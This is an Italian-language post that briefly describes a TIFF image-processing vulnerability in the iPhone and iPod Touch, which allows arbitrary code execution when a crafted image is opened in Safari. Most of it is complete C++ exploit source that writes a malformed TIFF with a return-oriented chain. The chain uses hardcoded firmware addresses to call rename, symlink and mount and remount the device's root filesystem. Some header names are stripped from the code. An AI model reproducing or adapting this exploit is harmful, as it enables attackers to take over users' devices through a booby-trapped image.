Una vulnerabilità in Apple iPod Touch e iPhone, può essere sfruttata da un utente malintenzionato per compromettere il dispositivo vulnerabile.

La stessa è causata da un errore nel processamento delle immagini TIFF e può essere sfruttato al fine di eseguire codice arbitrario, quando una particolare immagine TIFF malformata viene aperta, ad esempio mediante il browser Safari.

E' di seguito disponibile il codice exploit.

Exploit:

#include 
#include 
#include 
#include 

using namespace std;

void
print_pad(int n, char p = '\0')
{
for (int i = 0; i < n; i++)
printf("%c", p);
}

void
print_arr(char *arr, int size)
{
for (int i = 0; i < size; i++)
printf("%c", arr[i]);
}

struct Node
{
typedef enum { VAL, STACK, BYTES, PTR } NodeType;
NodeType type;

union
{
int value;
char bytes[4];
};

Node()
: type(VAL), value(0) 
{ }

Node(const Node &_node)
: type(_node.type), value(_node.value)
{ }

Node(int _value, NodeType _type = VAL)
: type(_type), value(_value)
{ }

};

struct Ptr
{
char *str;
Node node;
};

struct Stack
{
Stack(Node &_base, Ptr *_strings)
: base(_base), strings(_strings)
{ }

void Add(Node node)
{
switch (node.type)
{
case Node::BYTES:
base.value += node.value;
break;
case Node::STACK:
node.value += base.value;
// fall through
default:
base.value += 4;        
}

stack.push_back(node);
}

void Write()
{
for (int i = 0; strings[i].str; i++)
{
strings[i].node.value = base.value;
base.value += strlen(strings[i].str) + 1;
}

for (vector::iterator it = stack.begin(),

 end = stack.end(); it != end; ++it)
{
switch (it->type)
{
case Node::BYTES:
print_pad(it->value, 0x00);
break;
case Node::PTR:
print_arr(strings[it->value].node.bytes, 4);
break;
default:
print_arr(it->bytes, 4);
}
}

for (int i = 0; strings[i].str; i++)
{
print_arr(strings[i].str, strlen(strings[i].str) + 1);
}
}

vector stack;
Node base;
Ptr *strings;
};

void
build_tif(Node &sp, Node &pc)
{
char tif[] = 
{    
0x49,0x49,
0x2a,0x00,
0x1e,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,
0x08,0x00,
0x00,0x01,0x03,0x00,0x01,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x01,0x01,0x03,0x00,0x01,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x03,0x01,0x03,0x00,0x01,0x00,0x00,0x00,0xaa,0x00,0x00,0x00,
0x06,0x01,0x03,0x00,0x01,0x00,0x00,0x00,0xbb,0x00,0x00,0x00,
0x11,0x01,0x04,0x00,0x01,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
0x17,0x01,0x04,0x00,0x01,0x00,0x00,0x00,0x15,0x00,0x00,0x00,
0x1c,0x01,0x03,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x50,0x01,0x03,0x00,0xff,0x00,0x00,0x00,0x84,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,
};

print_arr(tif, sizeof(tif));
print_pad(104, 0x00);   
print_arr(sp.bytes, 4);
print_pad(12, 0x00);
print_arr(pc.bytes, 4);

}

int
main(int argc, char **argv)
{

if (argc != 2)
{
printf("Usage: %s \n", argv[0]);
return 1;
}

int version = (!strcmp(argv[1], "1.0.2") ? 0 : 1);

Ptr str[] = {
{ "/var/root/Media", 0 },
{ "/var/root/Oldmedia", 0 },
{ "/", 0 },
{ "hfs", 0 },
{ "/dev/disk0s1", 0 },
{ NULL, 0 }
};

Node base(version == 0 ? 0x0055a638 : 0x006f7638);

Stack stack(base, str);

Node ldmia_r4_r0(version == 0 ? 0x310b668c : 0x3125368c);
Node ldmia_sp_r4(0x3000adfc);
Node ldmia_sp_r0(0x300df800);

Node rename(0x30015530);
Node symlink(0x30027300);
Node mount(0x300267d0);
Node dead(0xdeadbeef);

build_tif(base, ldmia_r4_r0);

stack.Add(Node(0, Node::PTR)); 
stack.Add(Node(1, Node::PTR));
stack.Add(Node(20, Node::BYTES));
stack.Add(Node(12, Node::STACK));
stack.Add(ldmia_sp_r4); 
stack.Add(rename);

stack.Add(Node(12, Node::STACK));
stack.Add(Node(4, Node::BYTES));
stack.Add(ldmia_r4_r0);

stack.Add(Node(2, Node::PTR));
stack.Add(Node(0, Node::PTR));
stack.Add(Node(20, Node::BYTES));
stack.Add(Node(12, Node::STACK));
stack.Add(ldmia_sp_r0);
stack.Add(symlink);

stack.Add(Node(3, Node::PTR));
stack.Add(Node(2, Node::PTR));
stack.Add(Node(0x00050000, Node::VAL));
stack.Add(Node(8, Node::STACK));
stack.Add(mount);
stack.Add(Node(4, Node::PTR));

stack.Write();

return 0;
}